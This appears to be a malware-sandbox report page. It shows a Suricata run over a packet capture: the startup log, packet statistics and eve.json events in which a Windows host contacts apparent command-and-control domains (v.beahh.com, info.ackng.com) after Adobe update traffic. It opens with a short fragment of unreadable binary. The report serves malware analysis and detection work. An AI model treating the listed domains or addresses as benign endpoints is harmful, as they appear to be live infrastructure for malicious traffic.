B@@.rsrc0·	p¸	L@@.relocÀ0@B4\êiñ<Š¯À¨ð>̍™^\êi\êiñ<B^
'šº}E4™@€4,À¨ð>̍™’ŒŠé€ žt´


suricata-report-2019-04-03-T-13-40-21-04032019.1339-network.pcap.txt - (17550 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/04032019.1339-network.pcap -vvv -k none
elapsedtime:22.565926
stderr:
stdout:
3/4/2019 -- 13:39:58 - <Info> - Configuration node 'rule-files' redefined.
3/4/2019 -- 13:39:58 - <Notice> - This is Suricata version 4.0.0 RELEASE
3/4/2019 -- 13:39:58 - <Info> - CPUs/cores online: 1
3/4/2019 -- 13:39:58 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33270 and 'request-body-inspect-window' set to 15638 after randomization.
3/4/2019 -- 13:39:58 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31202 and 'response-body-inspect-window' set to 16588 after randomization.
3/4/2019 -- 13:39:58 - <Config> - DNS request flood protection level: 500
3/4/2019 -- 13:39:58 - <Config> - DNS per flow memcap (state-memcap): 524288
3/4/2019 -- 13:39:58 - <Config> - DNS global memcap: 16777216
3/4/2019 -- 13:39:58 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
3/4/2019 -- 13:39:58 - <Config> - preallocated 1000 hosts of size 136
3/4/2019 -- 13:39:58 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
3/4/2019 -- 13:39:58 - <Config> - using magic-file /usr/share/file/magic
3/4/2019 -- 13:39:58 - <Config> - Core dump size is unlimited.
3/4/2019 -- 13:39:58 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
3/4/2019 -- 13:39:58 - <Config> - preallocated 1000 defrag trackers of size 168
3/4/2019 -- 13:39:58 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
3/4/2019 -- 13:39:58 - <Config> - stream "prealloc-sessions": 2048 (per thread)
3/4/2019 -- 13:39:58 - <Config> - stream "memcap": 33554432
3/4/2019 -- 13:39:58 - <Config> - stream "midstream" session pickups: disabled
3/4/2019 -- 13:39:58 - <Config> - stream "async-oneside": disabled
3/4/2019 -- 13:39:58 - <Config> - stream "checksum-validation": disabled
3/4/2019 -- 13:39:58 - <Config> - stream."inline": disabled
3/4/2019 -- 13:39:58 - <Config> - stream "bypass": disabled
3/4/2019 -- 13:39:58 - <Config> - stream "max-synack-queued": 5
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "memcap": 134217728
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "depth": 0
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "toserver-chunk-size": 2568
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "toclient-chunk-size": 2650
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly.raw: enabled
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "segment-prealloc": 2048
3/4/2019 -- 13:39:58 - <Config> - Delayed detect disabled
3/4/2019 -- 13:39:58 - <Config> - pattern matchers: MPM: ac, SPM: bm
3/4/2019 -- 13:39:58 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
3/4/2019 -- 13:39:58 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
3/4/2019 -- 13:39:58 - <Config> - prefilter engines: MPM
3/4/2019 -- 13:39:58 - <Config> - IP reputation disabled
3/4/2019 -- 13:39:58 - <Perf> - Registered 148 keyword profiling counters.
3/4/2019 -- 13:39:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
3/4/2019 -- 13:39:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
3/4/2019 -- 13:39:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
3/4/2019 -- 13:40:03 - <Config> - No rules loaded from ET-icmp.rules.
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
3/4/2019 -- 13:40:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
3/4/2019 -- 13:40:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
3/4/2019 -- 13:40:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
3/4/2019 -- 13:40:08 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
3/4/2019 -- 13:40:11 - <Config> - No rules loaded from local.rules.
3/4/2019 -- 13:40:11 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
3/4/2019 -- 13:40:11 - <Info> - Threshold config parsed: 0 rule(s) found
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tcp-packet
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tcp-stream
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for udp-packet
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for other-ip
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_uri
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_request_line
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_client_body
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_response_line
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header_names
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header_names
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_accept
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_accept_enc
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_accept_lang
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_referer
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_connection
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_len
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_len
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_type
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_type
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_start
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_start
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_method
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_cookie
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_cookie
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_uri
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_user_agent
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_host
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_host
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_stat_msg
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_stat_code
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for dns_query
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_sni
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_cert_issuer
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_cert_subject
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_cert_serial
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for dce_stub_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for dce_stub_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_software
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_software
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for file_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for file_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_request_line
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_response_line
3/4/2019 -- 13:40:11 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
3/4/2019 -- 13:40:11 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
3/4/2019 -- 13:40:11 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
3/4/2019 -- 13:40:11 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
3/4/2019 -- 13:40:12 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
3/4/2019 -- 13:40:12 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
3/4/2019 -- 13:40:12 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
3/4/2019 -- 13:40:12 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
3/4/2019 -- 13:40:16 - <Perf> - Unique rule groups: 104
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toserver TCP packet": 35
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toclient TCP packet": 17
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toserver TCP stream": 33
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toclient TCP stream": 19
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toserver UDP packet": 27
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toclient UDP packet": 17
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "other IP packet": 3
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_uri": 14
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_request_line": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_client_body": 6
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_response_line": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_header": 10
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_header": 6
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_header_names": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_accept": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_referer": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_content_len": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_content_type": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_content_type": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_protocol": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_start": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_method": 5
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_cookie": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_cookie": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_host": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver dns_query": 4
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver tls_sni": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver file_data": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient file_data": 7
3/4/2019 -- 13:40:18 - <Perf> - Registered 39590 rule profiling counters.
3/4/2019 -- 13:40:18 - <Info> - fast output device (regular) initialized: alert
3/4/2019 -- 13:40:18 - <Info> - eve-log output device (regular) initialized: eve.json
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'alert'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'http'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'dns'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'tls'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'files'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'ssh'
3/4/2019 -- 13:40:18 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
3/4/2019 -- 13:40:18 - <Info> - stats output device (regular) initialized: stats.log
3/4/2019 -- 13:40:18 - <Config> - AutoFP mode using "Hash" flow load balancer
3/4/2019 -- 13:40:19 - <Info> - reading pcap file /var/pcap/04032019.1339-network.pcap
3/4/2019 -- 13:40:19 - <Config> - using 1 flow manager threads
3/4/2019 -- 13:40:19 - <Config> - using 1 flow recycler threads
3/4/2019 -- 13:40:19 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engine started.
3/4/2019 -- 13:40:19 - <Info> - No packets with

This file has been truncated. Go here to download in full.


stats.log - (3243 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
------------------------------------------------------------------------------------
Date: 4/3/2019 -- 13:40:20 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 17667
decoder.bytes                              | Total                     | 3740503
decoder.ipv4                               | Total                     | 16879
decoder.ipv6                               | Total                     | 17
decoder.ethernet                           | Total                     | 17667
decoder.tcp                                | Total                     | 16825
decoder.udp                                | Total                     | 68
decoder.icmpv4                             | Total                     | 3
decoder.avg_pkt_size                       | Total                     | 211
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 12925
flow.udp                                   | Total                     | 21
tcp.sessions                               | Total                     | 12921
tcp.syn                                    | Total                     | 13802
tcp.synack                                 | Total                     | 14
tcp.rst                                    | Total                     | 110
tcp.overlap                                | Total                     | 4
detect.alert                               | Total                     | 17
detect.nonmpm_list                         | Total                     | 6
detect.fnonmpm_list                        | Total                     | 3
detect.match_list                          | Total                     | 4
app_layer.flow.http                        | Total                     | 11
app_layer.tx.http                          | Total                     | 14
app_layer.flow.tls                         | Total                     | 1
app_layer.flow.dns_udp                     | Total                     | 8
app_layer.tx.dns_udp                       | Total                     | 8
app_layer.flow.failed_udp                  | Total                     | 13
flow_mgr.new_pruned                        | Total                     | 12
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 363
flow_mgr.flows_notimeout                   | Total                     | 363
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65183
flow_mgr.rows_maxlen                       | Total                     | 2
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7919296


eve.json - (27873 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
{"timestamp":"2019-03-29T09:47:38.758657+0000","flow_id":1339032990290817,"pcap_cnt":31,"event_type":"dns","src_ip":"192.168.240.16","src_port":62683,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2207,"rrname":"acroipm2.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:40.827629+0000","flow_id":238658074222829,"pcap_cnt":32,"event_type":"dns","src_ip":"192.168.240.16","src_port":63759,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13503,"rrname":"armmf.corp.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":238658074222829,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"armmf.corp.adobe.com"}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":238658074222829,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"adobe.com","rrtype":"SOA","ttl":133}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com","rrtype":"CNAME","ttl":2639,"rdata":"acroipm2.adobe.com.edgesuite.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com.edgesuite.net","rrtype":"CNAME","ttl":21032,"rdata":"a122.g2.akamai.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.145"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.136"}}
{"timestamp":"2019-03-29T09:47:38.928936+0000","flow_id":888907532888675,"pcap_cnt":45,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/278_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.930545+0000","flow_id":1253455767040432,"pcap_cnt":48,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/277_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":888907532888675,"pcap_cnt":52,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/281_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":1253455767040432,"pcap_cnt":54,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/280_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:40.427087+0000","flow_id":1253455767040432,"pcap_cnt":63,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:49:10.060695+0000","flow_id":222981449510167,"pcap_cnt":85,"event_type":"dns","src_ip":"192.168.240.16","src_port":49331,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30006,"rrname":"v.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:10.079964+0000","flow_id":222981449510167,"pcap_cnt":86,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49331,"proto":"UDP","dns":{"type":"answer","id":30006,"rcode":"NOERROR","rrname":"v.beahh.com","rrtype":"A","ttl":10,"rdata":"27.102.107.137"}}
{"timestamp":"2019-03-29T09:49:10.689650+0000","flow_id":893507448760061,"pcap_cnt":101,"event_type":"http","src_ip":"192.168.240.16","src_port":49427,"dest_ip":"27.102.107.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain"}}
{"timestamp":"2019-03-29T09:49:22.984973+0000","flow_id":893507448760061,"pcap_cnt":102,"event_type":"fileinfo","src_ip":"27.102.107.137","src_port":80,"dest_ip":"192.168.240.16","dest_port":49427,"proto":"TCP","http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6399},"app_proto":"http","fileinfo":{"filename":"\/vWORKGROUP","gaps":false,"state":"CLOSED","stored":false,"size":6399,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.426246+0000","flow_id":1253455767040432,"pcap_cnt":106,"event_type":"fileinfo","src_ip":"204.237.142.145","src_port":80,"dest_ip":"192.168.240.16","dest_port":49426,"proto":"TCP","http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9737},"app_proto":"http","fileinfo":{"filename":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","gaps":false,"state":"CLOSED","stored":false,"size":9737,"tx_id":2}}
{"timestamp":"2019-03-29T09:49:28.626953+0000","flow_id":1853673158775049,"pcap_cnt":110,"event_type":"dns","src_ip":"192.168.240.16","src_port":57392,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54797,"rrname":"info.ackng.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1853673158775049,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"info.ackng.com"}}
